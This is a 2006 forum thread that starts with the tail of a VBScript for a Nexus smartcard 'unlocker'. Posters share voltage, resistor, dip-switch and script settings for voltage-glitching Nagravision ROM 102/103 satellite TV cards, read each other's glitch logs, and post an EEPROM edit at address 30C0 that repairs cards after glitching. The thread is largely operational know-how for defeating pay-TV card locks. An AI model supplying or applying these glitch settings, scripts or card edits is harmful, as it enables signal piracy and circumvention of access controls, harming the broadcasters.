' number given by the first argument to a Hexadecimal string with its length
' equal to the number of digits given by the second argument
Dim RetVal
Dim CurLen

RetVal = Hex(Number)
CurLen = Len(RetVal)

If CurLen < Length Then
RetVal=String(Length-CurLen,"0") & RetVal
End If

HexString = RetVal

End Function

Function CheckChipVer()

CheckChipVer = 1

sc.write("90")
delay(80)

If sc.read(4) <> 4 Then
CheckChipVer = 0
Exit Function
End If

If getbyte(0) <> &H4E Then CheckChipVer = 0
If getbyte(1) <> &H44 Then CheckChipVer = 0
If getbyte(2) <> &H31 Then CheckChipVer = 0
If getbyte(3) <> &H33 Then CheckChipVer = 0

End Function

Public Function Hex2Dec(ByVal HexNumber)

' This function takes 1 argument, a string containing a hex value of any digit length
' and returns the decimal equivalent

Dim DecimalValue
Dim DigitCount
Dim Digit
Dim HexDigit

HexNumber = Replace(UCase(HexNumber), " ", "")
DigitCount = Len(HexNumber)

For Digit = 1 To DigitCount

HexDigit = Mid(HexNumber, Digit, 1)
If Asc(HexDigit) < 58 Then
DecimalValue = HexDigit * 16 ^ (DigitCount - Digit)
Else
DecimalValue = (Asc(HexDigit) - 55) * 16 ^ (DigitCount - Digit)
End If
Hex2Dec = Hex2Dec + DecimalValue
Next

End Function

Function setupunlocker()

Wx.BaudRate = 115200
Wx.ResetBaudRate = 115200
Wx.Parity = 0 ' 0 = None, 1 = Odd, 2 = Even, 3 = Mark, 4 = Space
Wx.StopBits = 0 ' 0 = 1 stop bit, 1 = 1.5 stop bits, 2 = 2 stop bits
Wx.DTRControl = 0 ' Initial state of DTR 0 = off, 1 = on
Wx.RTSControl = 1 ' Initial state of RTS 0 = off, 1 = on
Wx.ResetDelay = 100 ' In microseconds
Wx.ByteDelay = 10 ' In microseconds
Wx.RxByteTimeout = 500 ' In milliseconds
Wx.ResetMode = 2 ' 0 = No Resets, 1 = ISO Reset (Expect a ATR), 2 = Device Reset (No ATR)
Wx.ResetLine = 1 ' 0 = Toggle RTS for Reset, 1 = Toggle DTR for Reset
Wx.ByteConvention = 1 ' 0 = Inverse, 1 = Direct
Wx.FlushEchoByte = 0 ' 0 = no flush, 1 = flush - A Phoenix interface will echo each byte transmitted.
Wx.FlushBeforeWrite = 1 ' 0 = no flush, 1 = flush - Flush the receive buffer before each write to strip off Null bytes.
Wx.IgnoreTimeouts = 1 ' 0 = Abort script on a receive timeout, 1 = Ignore all receive timeouts
Wx.ResetAfterTimeout = 0 ' 0 = Don't reset after a timeout, 1 = do a reset after a timeout - Not used if "IgnoreTimeouts=0"
Wx.LogTransactions = 0 ' 0 = Don't log transactions, 1 = log transactions
Wx.DisplayUSW = 0 ' Display USW after script complete 0 = no, 1 = yes
Wx.DisplayFuse = 0 ' Display Fuse after script complete 0 = no, 1 = yes

End Function

Crazy1_79
08-06-2006, 12:09 AM
I am very interested in your success or looping stories. Please post results.

Trapofmind
08-06-2006, 06:48 AM
I just got my white Nexus from Milli, and I have been working on a rev 108. I haven't been able to get anything out of it; I suspect a defective loader.

I tried RebelSurf and now your script to no avail. It says "RX Data: -" while incrementally increasing the delay. RebelSurf's said "rstyadayada" repeatedly but no ---- or ++++ of any kind.

I realize that it may be this card but I don't have another locked card to prove this right now, and I'm not gonna glitch a good card.

I am running:
9v
700 ohm
dip 2 and 5 on
Newd13 (NewdRS when using Rebelsurf)
The card has an ATR and is a 102 rev 108

Trapofmind
08-06-2006, 07:01 AM
I have run the 108 script 3 times and after a bit (not sure but like 15 minutes) I get this:


Sc.Read: Timeout Reading Data From Card - 2 Bytes Requested, 0 Bytes Read, Continuing Script
Script Error on Line 223
Sc.GetByte: Requested Byte Exceeds Last Read Request

Do you think this white Nexus is broke?

Crazy1_79
08-06-2006, 07:07 AM
Turn up your voltage to the loader, Trapofmind, if you are using anything under 12 volts. If I run it at 7.5 volts I will get that too. I assume it is that the capacitors drain slowly and the voltage isn't enough to keep them charged. But if you are getting increasing AVR delay, then stop the script; something isn't right. Are you sure the card is not blockered? Try the 105 unlocking script for a few seconds just to see if you get ++++-----+++++----- out of it.

Trapofmind
08-06-2006, 08:18 AM
I increased the voltage to 12v and tried the other script, this time it halts immediately and says: REV 108

I got this card from a guy who got it from a guy who says he got it from a guy who says it's looped. But it has ATR and it reports ROM 102 rev 108. I heard back through that chain that the guy didn't have a loader capable of higher revs.

Crazy1_79
08-06-2006, 08:46 AM
what other script did you try?

JT
08-06-2006, 06:52 PM
Great post Crazy1. Thanks.

Trapofmind
08-07-2006, 12:57 PM
what other script did you try?

I tried the other script that you posted. I realize that it's for 106-107 and you said try a 105 script.

I have no idea if this card is blockered, I tried DEADBEEFBAADF00D but that didn't work.

N2edit says:
rom 102 rev 108
provider unknown

I wish I had a way to test this Nexus. Would a modded Mik III work? I've read elsewhere that they won't work on higher revs. (That's why I bought the white Nexus.)

JT
08-07-2006, 03:00 PM
Mik III has 4053 chips in it. For higher revs you want 4619 chips like in the nexus. Crazy's scripts are good. I'm gonna try trading out the chips in one of my extra Mik III's and see how it goes.

Crazy1_79
08-07-2006, 05:46 PM
Trapofmind, the reason I said to run the 105 script for a few seconds is because if the card is spoofed then the lower script may be what you need. By the responses you are getting, it tells me the card is not streamlocked but spoofed.

T_Tronix
08-07-2006, 06:04 PM
700 ohms?? Isn't that too high? I was told on many forums for rev108 to set the pot around 2.10 - 2.35 ohms (700 ohm seems to be an impossible number actually unless I am confusing something).

P.S. sorry for the PM I did not see your signature :)

Trapofmind
08-07-2006, 06:16 PM
Is there a particular script that you would recommend?

I've tried the one I used with my Mik III "ROM102_ND13_A0FF-INTERCEPT-autoVCC_202" but it errors out quickly.

I also tried RebelSerf_102_OmniUnlocker_-StubbornFix2 to no avail.

Perhaps if I stuck it in the freezer on some Holy water ice cubes

Crazy1_79
08-08-2006, 02:57 AM
700 ohms?? Isn't that too high? I was told on many forums for rev108 to set the pot around 2.10 - 2.35 ohms (700 ohm seems to be an impossible number actually unless I am confusing something).

P.S. sorry for the PM I did not see your signature :)
Hey tronix, you are setting yours at 2.1K which is 2100 ohms or 2.35K which is 2350 ohms; that is with the ohm meter set at the 20K setting. I use the 2000 ohms setting and dial it in at 700, or .7 at the 20K setting.

Crazy1_79
08-08-2006, 02:58 AM
I wonder why they are erroring out. The autvcc20 is the one I usually use; however, I changed the VCCs in it to run from 15 to 0 as well, not 90 to 2.

1one
08-08-2006, 04:36 AM
Crazy1_79,
Is the pot on this loader an infinitely variable pot or 5.0, 2.2, etc.? Just a little info please. Is the pot one that one might be able to adjust with a shaking hand?
See my sig.

shark
08-08-2006, 04:55 AM
1one,

The one drawback to the white nexus is the pot. It is not a multi-turn pot and in the 200-700 Ohm range, mine is a little more than sensitive! I should have gone into micro-surgery based on the precision that is required for mine.

1one
08-08-2006, 04:59 AM
Shark,
Thanks!!! Just the guidance that I was searching for!

Trapofmind
08-08-2006, 05:28 AM
Agreed, the pot is touchy, but with a good ohm meter and three hands you can get whatever you need.

1one
08-08-2006, 05:57 AM
I can barely get one hand to work. And I have five working for me!

Trapofmind
08-08-2006, 05:58 AM
I wonder why they are erroring out. The autvcc20 is the one I usually use; however, I changed the VCCs in it to run from 15 to 0 as well, not 90 to 2.

I don't mean to fill this thread with my crap when it should be about these cool scripts...

But this thing is odd, no matter what script I run it just resets. However it still has ATR and rev 108. If I try any older (I hate to keep typing the word script, so I won't...oh crap) it errors out quickly, within a minute. If I use RebelSurf's or the ones on this page they continue on for a while but rst continuously.

I don't know, but if a card is locked with a blocker doesn't it pop easier than if it's streamlocked? I know that was the case with the Rom 10's.

1one
08-08-2006, 06:14 AM
I haven't tried crazy1_79's scripts. I don't mean to speak for him. I believe he wants us to come to an intelligent conclusion based on his personal results. I appreciate any info, regardless of whether it's in the wrong thread or not.

larry007
08-10-2006, 05:30 AM
Where is the CAM's signature when you read the card? Can I still register with romcoder? Is the CAM on the back of the card? It also says unknown provider rev107, good ATR. Any help finding the CAM to register; trying to get back into testing again. did dave I have no idea where the CAM is, please help!

T_Tronix
08-10-2006, 11:47 PM
Tried with 3 cards:

1) one looped
2) two others did not pop, and I'm not going to try anymore since I don't want any other looped cards.

sholz042
08-20-2006, 07:59 PM
What settings do you use in WinExplorer for the 108 script?
UNlooper,Loader 2,102...etc....?
rec timeout?
byte delay?
reset delay?
stop bits?
parity?

Trapofmind
08-21-2006, 09:45 PM
I acquired a ROM 102 rev 106 today, it popped in under a minute using your script. That confirms my "white" Nexus works swell.

REALLY PISSED
08-22-2006, 12:06 AM
i have a 102 that is blockered to 109 and it does the same thing as you mentioned times out after a few avr increase messages... i have tried every script that i can think of to get back into it...

lightning0009
08-22-2006, 01:43 AM
Trapofmind, if your rev108 is provider unknown you need the RebelSurf fubar unlocking script.

Trapofmind
08-22-2006, 07:55 AM
Been there, done that. Every script I try times out or errors out quickly. This card needs something special.

regisma
08-23-2006, 04:55 AM
Hi,

Can someone suggest a good pot and a place to buy it?

thanks

Reg

regisma
08-23-2006, 05:14 AM
Hi,

Just found this one at Mouser for $10.50

Multi Turn Potentiometers 7/8 5K OHM 10 TURN WIREWOUND

Operating Temperature Range: -55 C to +125 C
Resistance: 5 K Ohms
Termination Style: Solder Lugs
Tolerance: +/- 5 %
Product Category: Multi Turn Potentiometers

hxxp://www.bitechnologies.com/pdfs/7280.pdf


Reg

Sat4All
08-23-2006, 08:01 AM
I have a few power supplies and I want to know which is better for my t911

1- 9v - 100ma
2- 9v - 200ma
3- 12v - 500ma
4- 12v - 700ma

thanks!!!

Crazy1_79
08-23-2006, 08:16 AM
I have a few power supplies and I want to know which is better for my t911

1- 9v - 100ma
2- 9v - 200ma
3- 12v - 500ma
4- 12v - 700ma

thanks!!!
I think the 100 and 200 MA may be a little too low. 300ma is better, so I would try the 12 volt 500ma

cejarret
08-23-2006, 11:06 PM
turn up your voltage to the loader trapofmind if you are using anything under 12 volts. If I run it at 7.5 volts I will get that too. I assume it is the capacitors drain slowly and the voltage isn't enough to keep them charged. but if you are getting increasing AVR delay, then stop the script something isn't right. are you sure the card is not blockered? try the 105 unlocking script for a few seconds just to see if you get ++++-----+++++----- out of it.

Could you tell me how to turn the voltage on the white nexus from mili?

masterbugalu
08-23-2006, 11:43 PM
Hi
I use the script 102 R105, with my white unlocker from milli and I receive this message
TX Data : 90
RX Data : 4E 44 31 33
Let the 102 Glitching begin....
-NoRsp+-NoRsp+---+----NoRsp+----NoRsp+-NoRsp+---+----+----+---NoRsp+-+----+----+----+--
TX Data : A1
===========================================
Glitch Success!! A0FF-INTERCEPT IS ON
BootLoader 6F 00 RSP Received!!
VCC = 06 (~0.117647058823529 vdc)
Glitch Delay = 0325
Glitch type 06
===========================================
Script Script File: Transmission Completed

Timeout from 2A command
The Update Status Word is at 0 (Decimal)
The Fuse Byte is at 0 (Decimal)
Does this mean that an error happened, or that the card was unlocked?

Thanks and waiting...

Sat4All
08-24-2006, 06:40 AM
I think the 100 and 200 MA may be a little too low. 300ma is better, so I would try the 12 volt 500ma
I bought a new power supply, this one is 1.5V to 12V 300mA. One Q: where do I have to read the ohms? Because I think I'm reading in the wrong place. If you can, please put a pic. Excuse my English, it is not too good.

Texas Trophy
08-24-2006, 06:47 AM
If you have the white nexus, look at the pic at the top of the page. The pot is to the right of the dip switches and to the right of that are 2 pads. This is where you want to read ohms.

Sat4All
08-24-2006, 07:24 AM
If you have the white nexus, look at the pic at the top of the page. The pot is to the right of the dip switches and to the right of that are 2 pads. This is where you want to read ohms.

That's what i have

The Specialist
08-24-2006, 03:49 PM
Thanks Crazy, managed to unlock 2 out of 3 Rev 107 cards which I have been struggling with for over 1 week. Using Blue Nexus 205 OHMS (close as I could get it to 200) dips 2 & 5 ON, 9v 300mA. Only problem is both cards took over 45min and both have gone unknown provider. With that being said I was able to read the cards still, clean them, and load them and they work perfectly fine in the receiver. Just need to fix the unknown provider and all good to go. Will have to play a little more with that one stubborn one. Any ideas for the unknown provider problem??

TS

thorn1968
08-24-2006, 05:41 PM
Hi

Glitch Success!! A0FF-INTERCEPT IS ON



That means you're in. Try reading the card in n2edit.
Save the image, clean the codespace and write the clean image back to the card.

Crazy1_79
08-24-2006, 07:09 PM
Thanks Crazy, managed to unlock 2 out of 3 Rev 107 cards which I have been struggling with for over 1 week. Using Blue Nexus 205 OHMS (close as I could get it to 200) dips 2 & 5 ON, 9v 300mA. Only problem is both cards took over 45min and both have gone unknown provider. With that being said I was able to read the cards still, clean them, and load them and they work perfectly fine in the receiver. Just need to fix the unknown provider and all good to go. Will have to play a little more with that one stubborn one. Any ideas for the unknown provider problem??
TS
perfectly normal for them to go unknown provider after glitching higher revs. you put the blocker on it and it will come out of it, or change 30C0 from this
$30C0=BFBF8703808000000000000000000000

To this
$30C0=A7BF8703808000000000000000000000

that will fix unknown provider. when you glitch it changes dataspace pointer to BFBF and it should be A7BF, the change is perfectly normal.. no reason to get worried.

Crazy1_79
08-24-2006, 07:10 PM
Hi
I use the script 102 R105, with my white unlocker from milli and I receive this message
TX Data : 90
RX Data : 4E 44 31 33
Let the 102 Glitching begin....
-NoRsp+-NoRsp+---+----NoRsp+----NoRsp+-NoRsp+---+----+----+---NoRsp+-+----+----+----+--
TX Data : A1
===========================================
Glitch Success!! A0FF-INTERCEPT IS ON
BootLoader 6F 00 RSP Received!!
VCC = 06 (~0.117647058823529 vdc)
Glitch Delay = 0325
Glitch type 06
===========================================
Script Script File: Transmission Completed

Timeout from 2A command
The Update Status Word is at 0 (Decimal)
The Fuse Byte is at 0 (Decimal)
Does this mean that an error happened, or that the card was unlocked?

Thanks and waiting...





that means you glitched into card, read and proceed as normal. congrats. you popped a card.

SURFGUY
08-24-2006, 11:39 PM
I am trying your script on my Inboard Rom 102 - Rev. 285.
It is running now, but don't know if it will work on this high a rev.
I thought I read that this 285 was the equivalent to Rev. 107 for plastic, but when I tried the 106-107 script it would not run in Winexplore 5.0.

What can you suggest for those of us with the 311 IRD's and the inboard rom 102's, starting at Rev. 281 and goes up?

Thanks for any help Crazy1

Surfguy:)

SURFGUY
08-25-2006, 12:23 AM
Have another question about your very first post.
You state that you set the delay start to 3800. When I do that it reverts to 420. I can't find how to set the vcc start & limit to 15 and 00.
At the bottom of the Nagramaster Loader version window, I see - DELAY START- DELAY LIMIT - GLITCH MAX - GLITCH MIN - MIX - VCC MAX - TRYS.
Am I missing something and perhaps you have a different version of Nagramaster. Or are you talking about a different program?
I have messed with the default settings so many times, that I don't know what the default settings are supposed to be, or what works the best for everyone else!!!

Any help would be great at this point! My first rev. 285 I looped and don't want to do the same with this one!

Surfguy:)

The Specialist
08-25-2006, 01:38 AM
perfectly normal for them to go unknown provider after glitching higher revs. you put the blocker on it and it will come out of it, or change 30C0 from this
$30C0=BFBF8703808000000000000000000000
To this
$30C0=A7BF8703808000000000000000000000
that will fix unknown provider. when you glitch it changes dataspace pointer to BFBF and it should be A7BF, the change is perfectly normal.. no reason to get worried.


WOOOOOOOHOOOOOOOO worked like a charm thanks CRAZY!!

thorn1968
08-25-2006, 03:08 AM
perfectly normal for them to go unknown provider after glitching higher revs. you put the blocker on it and it will come out of it, or change 30C0 from this
$30C0=BFBF8703808000000000000000000000

To this
$30C0=A7BF8703808000000000000000000000

that will fix unknown provider. when you glitch it changes dataspace pointer to BFBF and it should be A7BF, the change is perfectly normal.. no reason to get worried.

Doesn't cleaning the codespace do the same thing?

Texas Trophy
08-25-2006, 03:20 AM
Doesn't cleaning the codespace do the same thing?

No

Crazy1_79
08-25-2006, 06:26 AM
Doesn't cleaning the codespace do the same thing?
TT is in one of those quick answer moods!! Been there a million times myself. Cleaning codespace will clean card's EEPROM from A700 to BFFF. That line of code is at 30C0, which is codespace that runs from 3000 to A6FF, but of course the card's RAM is in there too, which is a nice chunk of space itself.

Crazy1_79
08-25-2006, 06:31 AM
Have another question about your very first post.
You state that you set the delay start to 3800. When I do that it reverts to 420. I can't find how to set the vcc start & limit to 15 and 00.
At the bottom of the Nagramaster Loader version window, I see - DELAY START- DELAY LIMIT - GLITCH MAX - GLITCH MIN - MIX - VCC MAX - TRYS.
Am I missing something and perhaps you have a different version of Nagramaster. Or are you talking about a different program?
I have messed with the default settings so many times, that I don't know what the default settings are supposed to be, or what works the best for everyone else!!!

Any help would be great at this point! My first rev. 285 I looped and don't want to do the same with this one!

Surfguy:)
Surfguy, I have never popped a rev 285, never had to try. Skinerd, who is a hell of a hardware modder and Glitcher, told me they are a bitch and will more than likely loop. Try dips 1 and 6 down, ohms at 700, with the modified 107 and 106 scripts. VCC will probably have to be changed too. I recently did a bunch of the cardless 311's and have learned a thing or two about them in the process. Different dips to pop them, every card can have its slight variant in VCC responses.

Sat4All
08-25-2006, 07:38 AM
I still have a problem with my unlocker. It does nothing. When I start glitching it runs fine, but at 15 or 25 min the glitch response stops but the # of rest still runs, that's in MR-Ultimaten2. In the Rebelserf_rev_108_244 I don't have any response.

I have 3 102 cards = 1 rev_107 & 2 rev_108
I test any combination that I read
I think I need something for Dummy



If anyone can give me light in my shadow I'd appreciate it...

SURFGUY
08-25-2006, 07:27 PM
Surfguy, I have never popped a rev 285, never had to try. Skinerd, who is a hell of a hardware modder and Glitcher, told me they are a bitch and will more than likely loop. Try dips 1 and 6 down, ohms at 700, with the modified 107 and 106 scripts. VCC will probably have to be changed too. I recently did a bunch of the cardless 311's and have learned a thing or two about them in the process. Different dips to pop them, every card can have its slight variant in VCC responses.

I have figured out what your settings referred to, so no need to answer that part of my question. They are for changing the script in use with WinExplore proggy.

Now my new problem is that I just looped my second 311 at Rev. 285. Unlike before, instead of using the script files in Winexplore to loop my first one, this time I was just using Nagramaster (Loader version) and used these settings:
MIX=5 VCC=20 TRYS=120
The other settings were at their default.(All settings were for the White Nexus Loader 4619)
Apparently I was using settings that were a bit too aggressive!

I hope others will be careful, and learn from my mistakes!

LOL,
Surfguy:D

saulunlooper
08-26-2006, 01:52 AM
I read there is a script for card with provider unknown. Someone said you should use Rebelserf script to unlock cards with unknown provider. and rom10x... script for cards with provider. Hope this helps. I just unlocked a rom 102 rev 107 with pot set at 215. loader 3 settings, Blue nexus with 4619 chips, Rom10x... script, Newd13 flash, pins 2 and 5 on, 7.5 volts 500 ma. It unlocked in about a minute.

tyfon
08-27-2006, 10:53 AM
I have a similar problem with an IRD 322 Rom103 rev 382,386

Sorry for the duplicate post.. I kept looking and found this thread..

The first IRD 322 rev 386 will not respond so I went to the second, rev 382..
The only way to get some kind of response is to use the Mikobu111 mod..
I have used this for 311 IRDs with no problems.. so I reflashed with one with newdS rebeld 307_387 unlocker script
with 4619 chips installed, and below you will see that it runs for a little bit then it stops..

Now.. if I use the unlocker sold by MILI, the nexus with white case (as MILI stated, it is the same as the blue case),
this is what I get, and it also stops at line 138: it starts -----------------------------------------
and stops.. I have tried dip 4, 2 & 5, 1, 5 and voltage 7.5............9.5.......12.5
and still no dice.. has anybody had any good response with this unlocker sold by MILI.....................
Sorry for the long post, but it is hard for me to navigate on dial up....

Question: I read (loader 2 or loader 3). What does this mean? It is supposed to be at the bottom of the script.
I can't figure it out. Can someone explain?

thanks again
tyfon

RESULTS with MIKOBU111 MOD with 4619 chips installed.
With the white case unlocker sold by MILI I get ----------------- and it stops in seconds
I get an error on line 138, same as below.

Rom 103, Rev 382 found.
Initial Parameters = Delay:31F0 VCC:20 Glitch Type:07+07Rst2007Rst2007Rst21------Sc.Read:
Timeout Reading Data From Card - 2 Bytes Requested, 0 Bytes Read,
Continuing ScriptScript Error on Line 138
Sc.GetByte: Requested Byte Exceeds Last Read Request

pot set at 7.9 ohms
Rom 103, Rev 382 found.Initial Parameters = Delay:31F0 VCC:20 Glitch Type:07++++++++++07Rst22+Sc.Read: Timeout Reading Data From Card - 2 Bytes Requested, 0 Bytes Read, Continuing ScriptScript Error on Line 114
Sc.GetByte: Requested Byte Exceeds Last Read Request

pot set at 16 ohms
Rom 103, Rev 382 found.Initial Parameters = Delay:31F0 VCC:20 Glitch Type:07+07Rst20+++++++++07Rst23++07Rst24++++++++++ +++++++++++++++++++07Rst2B07Rst2B+07Rst2C+07Rst2C+ ++++++++++++++++++++++++++++++Sc.Read: Timeout Reading Data From Card - 2 Bytes Requested, 0 Bytes Read, Continuing ScriptScript Error on Line 138
Sc.GetByte: Requested Byte Exceeds Last Read Request

Pot set 18.9 at 7 volts
Ram Intercept Installed. Trying to Open the 103.... Delay:31F1 VCC:48 Glitch Type:07Elapsed = 00:00:1807Rst4807Rst4807Rst49+07Rst4907Rst4A+07Rst 4A++07Rst4B+07Rst4B+07Rst4C07Rst4C+07Rst4C07Rst4D+ 07Rst4D07Rst4E07Rst4E07Rst4E07Rst4E07Rst4E07Rst4F0 7Rst4F07Rst4F07Rst5007Rst5007Rst50+07Rst5007Rst510 7Rst5107Rst5107Rst52+07Rst5207Rst52Sc.Read: Timeout Reading Data From Card - 2 Bytes Requested, 0 Bytes Read, Continuing ScriptScript Error on Line 138
Sc.GetByte: Requested Byte Exceeds Last Read Request



your help is appreciated.. thanks again

tyfon

mustwatchtv
08-29-2006, 04:42 AM
I tried the rev106 107 modified script and another horror story looped in 8 seconds bye bye 107 kiss my $200.00 good bye

oh well
what I used:

white nexus from here 9v, 2 and 5 on newd13 .125 under 2k settings ran this on other scripts without errors just didn't want to pop so I decided to try this script

Crazy1_79
08-29-2006, 04:47 AM
should have read thread and tried 700 ohms

Crazy1_79
08-29-2006, 05:05 AM
I have a similar problem with an IRD 322 Rom103 rev 382,386

Sorry for the duplicate post.. I kept looking and found this thread..

The first IRD 322 rev 386 will not respond so I went to the second, rev 382..
The only way to get some kind of response is to use the Mikobu111 mod..
I have used this for 311 IRDs with no problems.. so I reflashed with one with newdS rebeld 307_387 unlocker script
with 4619 chips installed, and below you will see that it runs for a little bit then it stops..

Now.. if I use the unlocker sold by MILI, the nexus with white case (as MILI stated, it is the same as the blue case),
this is what I get, and it also stops at line 138: it starts -----------------------------------------
and stops.. I have tried dip 4, 2 & 5, 1, 5 and voltage 7.5............9.5.......12.5
and still no dice.. has anybody had any good response with this unlocker sold by MILI.....................
Sorry for the long post, but it is hard for me to navigate on dial up....

Question: I read (loader 2 or loader 3). What does this mean? It is supposed to be at the bottom of the script.
I can't figure it out. Can someone explain?

thanks again
tyfon

RESULTS with MIKOBU111 MOD with 4619 chips installed.
With the white case unlocker sold by MILI I get ----------------- and it stops in seconds
I get an error on line 138, same as below.

Rom 103, Rev 382 found.
Initial Parameters = Delay:31F0 VCC:20 Glitch Type:07+07Rst2007Rst2007Rst21------Sc.Read:
Timeout Reading Data From Card - 2 Bytes Requested, 0 Bytes Read,
Continuing ScriptScript Error on Line 138
Sc.GetByte: Requested Byte Exceeds Last Read Request

pot set at 7.9 ohms
Rom 103, Rev 382 found.Initial Parameters = Delay:31F0 VCC:20 Glitch Type:07++++++++++07Rst22+Sc.Read: Timeout Reading Data From Card - 2 Bytes Requested, 0 Bytes Read, Continuing ScriptScript Error on Line 114
Sc.GetByte: Requested Byte Exceeds Last Read Request

pot set at 16 ohms
Rom 103, Rev 382 found.Initial Parameters = Delay:31F0 VCC:20 Glitch Type:07+07Rst20+++++++++07Rst23++07Rst24++++++++++ +++++++++++++++++++07Rst2B07Rst2B+07Rst2C+07Rst2C+ ++++++++++++++++++++++++++++++Sc.Read: Timeout Reading Data From Card - 2 Bytes Requested, 0 Bytes Read, Continuing ScriptScript Error on Line 138
Sc.GetByte: Requested Byte Exceeds Last Read Request

Pot set 18.9 at 7 volts
Ram Intercept Installed. Trying to Open the 103.... Delay:31F1 VCC:48 Glitch Type:07Elapsed = 00:00:1807Rst4807Rst4807Rst49+07Rst4907Rst4A+07Rst 4A++07Rst4B+07Rst4B+07Rst4C07Rst4C+07Rst4C07Rst4D+ 07Rst4D07Rst4E07Rst4E07Rst4E07Rst4E07Rst4E07Rst4F0 7Rst4F07Rst4F07Rst5007Rst5007Rst50+07Rst5007Rst510 7Rst5107Rst5107Rst52+07Rst5207Rst52Sc.Read: Timeout Reading Data From Card - 2 Bytes Requested, 0 Bytes Read, Continuing ScriptScript Error on Line 138
Sc.GetByte: Requested Byte Exceeds Last Read Request



your help is appreciated.. thanks again

tyfon


Whoa dude, you are using 102 scripts to try to open a rom 103. I can't believe you haven't looped it. get some 103 scripts and try again.

$$dollarz
08-29-2006, 05:54 AM
I have a white nexus loader I just got from mili which has looped 4 cards in a row for me in less than 30 seconds each. I have been unlocking rom 102 240-241 and 311 internal cams with only 1 out of 50 looped using orange nexus. I used the same power supply (12v) and serial cable from the orange nexus. The pot was set to 250 ohm. What the F**k is going on with this unlocker! Could someone take a picture of their unlocker so I can see if the pot is installed correctly..

Crazy1_79
08-29-2006, 07:00 AM
I have a white nexus loader I just got from mili which has looped 4 cards in a row for me in less than 30 seconds each. I have been unlocking rom 102 240-241 and 311 internal cams with only 1 out of 50 looped using orange nexus. I used the same power supply (12v) and serial cable from the orange nexus. The pot was set to 250 ohm. What the F**k is going on with this unlocker! Could someone take a picture of their unlocker so I can see if the pot is installed correctly..
once again read whole thread, try ohms at 700 and dips 2 and 5

$$dollarz
08-30-2006, 12:32 AM
Hello,
I have a friend who has a white nexus also, I don't see how a setting of 250 ohms and going to 700 ohms is going to keep from looping my cards. If anything, from everything I've read the higher ohms will loop faster. My dip settings have been at 2 and 5 on while running unlocker scripts. I mean this thing is literally looping cards in less than 30 seconds, something greater is the real problem. I believe I have excluded the power supply, computer and serial cable, winex settings, script, because all of these have been tested on my friend's white nexus and work without problems. I'm not sure what is looping my cards but 30 seconds would indicate it may be a hardware problem. 700 ohms is not a magical setting, many people have had success at the ohms setting I've tried it at, including my friend's unlocker which he has not moved from that setting and has done no less than 30 rom 102's.

mustwatchtv
08-30-2006, 01:56 AM
crazy1_79 is right, I went back and popped 2 rev 108's at .892 ohms, very close to .700 ohms

lesson learned !!!!!!!

$$dollarz
08-30-2006, 03:52 AM
Hello,
I have no doubt the setting will work for some, what I'm saying is with the lower ohm setting it might not unlock but it should not loop 5 cards no way no how. I'm sure people have used lower settings to unlock or they have adjusted their pot in an attempt to unlock down to 250 ohms but their cards did not loop. My friend's white unlocker has done several cards at 250 ohm no problem so that's what I was basing my starting point at, then adjust to higher ohms if it would not unlock. The thing is I never got much of a chance when cards were looping at less than 30 seconds. If anyone has some explanation as to what might be wrong please let me know.

Crazy1_79
08-30-2006, 03:59 AM
Dollarz. they are all very touchy cards. 700 ohms from 200 cut my looping in half. since I have used the scripts I posted. I am 100 percent.

$$dollarz
08-30-2006, 04:07 AM
Hello, I totally agree with what you're saying and your script has worked fine to unlock 2 cards with my friend's unlocker at 250 ohms. What I disagree with is that there is some universal setting of 700 ohms that works on these white unlockers, that would be totally untrue. Each unlocker is unique in the fact that the card, computer, power supply, serial cable are different. I'm sure that those using a 12v power supply when measured can vary from 11v to 13.5v easily and the amps for each again is different, creating even more variables. I have tried 700 ohms on my unlocker (would not let script run more than 10 seconds), all I get is ff's, when the very same script and setup on my friend's white unlocker works perfectly. I know I'm sounding like some prick with my incessant posts but I really need help to get this thing working right or just junk it.

GeordieCA
08-30-2006, 01:18 PM
Could someone take a picture of their unlocker so I can see if the pot is installed correctly..

There you go. Good luck.

The two wires attached are my addition. They go to test clips.

$$dollarz
08-30-2006, 05:13 PM
Hello,
Thanks for taking the time to post the picture. Unfortunately everything looks like it's installed correctly with the same type pot on my device. I still can't figure out what is looping my cards. Maybe I have it all wrong and because this thing is 100% in looping my 5 cards that I should try and use it as an unlooper??.

genehackman
08-30-2006, 07:45 PM
crazy1 - I got a 284 and 286 311's that I just can't get to open - Your expert advice would be great. oh and it's with a white nexus, variable power supply 7.5, 9 or 12 Volts 500 ma

Dssslave
09-01-2006, 09:33 AM
can someone explain why, when using this script, or any of the rom10x scripts, I can get past AVR delay 23.